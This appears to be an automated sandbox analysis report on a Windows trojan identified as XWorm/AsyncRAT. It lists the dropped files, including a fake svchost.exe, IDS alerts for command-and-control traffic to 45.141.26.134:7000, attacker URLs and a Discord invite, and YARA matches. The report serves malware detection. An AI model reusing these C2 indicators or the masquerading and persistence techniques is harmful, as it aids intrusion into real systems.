                  Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.134:7000 -> 192.168.2.10:54562
                  Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.10:54562 -> 45.141.26.134:7000
                  Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.134:7000 -> 192.168.2.10:54562
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.26.134 7000Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 45.141.26.134
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.10:54562 -> 45.141.26.134:7000
                  Source: global trafficTCP traffic: 192.168.2.10:54533 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 0000000E.00000002.1973377511.000002B033102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                  Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                  Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, All function.exe, 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000009.00000002.1798379341.000002239EA00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1973377511.000002B033142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: powershell.exe, 00000012.00000002.2194708953.0000017F73B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsu.S
                  Source: powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://discord.gg/sGNBaJSzYD
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://discord.gg/sGNBaJSzYDstart
                  Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                  Source: powershell.exe, 00000009.00000002.1798528406.000002239EB4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5alC
                  Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://qualityboy.rdcw.xyz/
                  Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://qualityboy.rdcw.xyz/slumzickx
                  Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://scripts.sil.org/OFLThis
                  Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CCE5B93_2_00007FF7C0CCE5B9
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC6E723_2_00007FF7C0CC6E72
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC12903_2_00007FF7C0CC1290
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC17193_2_00007FF7C0CC1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC60C63_2_00007FF7C0CC60C6
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC20F13_2_00007FF7C0CC20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FF7C0CC10A53_2_00007FF7C0CC10A5
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FF7C0CF17195_2_00007FF7C0CF1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FF7C0CF20F15_2_00007FF7C0CF20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FF7C0CF10385_2_00007FF7C0CF1038
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF7C0CF171922_2_00007FF7C0CF1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF7C0CF20F122_2_00007FF7C0CF20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_00007FF7C0CF103822_2_00007FF7C0CF1038
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF7C0CF171923_2_00007FF7C0CF1719
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF7C0CF20F123_2_00007FF7C0CF20F1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 23_2_00007FF7C0CF103823_2_00007FF7C0CF1038
                  Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
                  Source: file.exe, 00000000.00000000.1539464700.000000000149E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAll function.exe4 vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameAll function.exe4 vs file.exe
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.csCryptographic APIs: 'TransformFinalBlock'
                  Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@26/25@1/2
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\All function.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\All function.exeMutant created: \Sessions\1\BaseNamedObjects\iA9C1vysNYIl098GM
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\5tjosB4RVZjT5QLU
                  Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\0TU0C3RSTsWis1TFM
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 73%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe"
